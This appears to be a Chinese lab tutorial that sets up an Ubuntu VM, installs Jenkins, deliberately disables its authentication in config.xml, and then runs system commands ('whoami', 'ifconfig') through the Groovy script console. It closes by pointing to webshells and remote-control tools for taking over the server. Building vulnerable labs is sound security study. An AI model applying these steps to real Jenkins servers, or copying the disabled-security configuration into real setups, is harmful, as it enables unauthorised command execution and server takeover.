实验环境

  • ubuntu20 虚拟机

安装 Jenkins

安装Java

plaintext
1
2
sudo apt update
sudo apt install openjdk-11-jdk

开始安装Jenkins

  • 使用下面的wget命令,导入 Jenkins 软件源的 GPG keys:
plaintext
1
wget -q -O - https://pkg.jenkins.io/debian/jenkins.io.key | sudo apt-key add -
  • 下一步,添加软件源到系统中:
plaintext
1
sudo sh -c 'echo deb http://pkg.jenkins.io/debian-stable binary/ > /etc/apt/sources.list.d/jenkins.list'
  • 一旦 Jenkins 软件源被启用,升级apt软件包列表,并且安装最新版本的 Jenkins:
plaintext
1
2
sudo apt update
sudo apt install jenkins

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-21_11-28-04_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-21_11-28-04_d41d8cd98f00b204e9800998ecf8427e.jpg

  • Ubuntu安装Jenkins报错解决
plaintext
1
2
3
4
5
6
7
8
9
10
11
12
13
14
正在读取软件包列表... 完成
W: https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu/dists/jammy/InRelease: 密钥存储在过时的 trusted.gpg 密钥环中(/etc/apt/trusted.gpg),请参见 apt-key(8) 的 DEPRECATION 一节以了解详情。
W: GPG 错误:https://pkg.jenkins.io/debian-stable binary/ Release: 由于没有公钥,无法验证下列签名: NO_PUBKEY 5BA31D57EF5975CA
E: 仓库 “http://pkg.jenkins.io/debian-stable binary/ Release” 没有数字签名。
N: 无法安全地用该源进行更新,所以默认禁用该源。
N: 参见 apt-secure(8) 手册以了解仓库创建和用户配置方面的细节。
正在读取软件包列表... 完成
正在分析软件包的依赖关系树... 完成
正在读取状态信息... 完成           
没有可用的软件包 jenkins,但是它被其它的软件包引用了。
这可能意味着这个缺失的软件包可能已被废弃,
或者只能在其他发布源中找到

E: 软件包 jenkins 没有可安装候选
  • 找到

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-21_11-31-41_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-21_11-31-41_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 把key替换成自己的
plaintext
1
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 5BA31D57EF5975CA

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_202341_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_202341_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 再次执行
plaintext
1
2
sudo apt update
sudo apt install jenkins
  • 验证
plaintext
1
systemctl status jenkins
  • 调整防火墙
plaintext
1
sudo ufw allow proto tcp from 192.168.121.0/24 to any port 8080
plaintext
1
sudo ufw allow 8080
  • 访问

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-21_11-39-42_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-21_11-39-42_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-21_11-41-27_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/Snipaste_2023-10-21_11-41-27_d41d8cd98f00b204e9800998ecf8427e.jpg

配置未授权

plaintext
1
vim  /var/lib/jenkins/config.xml
plaintext
1
2
3
 <useSecurity>true</useSecurity>
改为
<useSecurity>false</useSecurity>
  • 重启
plaintext
1
systemctl restart jenkins

至此未授权的Jenkins搭建完成

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/sss_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/sss_d41d8cd98f00b204e9800998ecf8427e.jpg

命令执行

plaintext
1
2
println "whoami".execute().text 
println "ifconfig".execute().text

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/dasdasd_d41d8cd98f00b204e9800998ecf8427e.jpg

https://gh.putdown.top/https://github.com/futalk/tuchuang/raw/main/img/dasdasd_d41d8cd98f00b204e9800998ecf8427e.jpg

  • 能执行命令的话拿到服务器的权限就简单了,如上线supershell,写webshell等操作。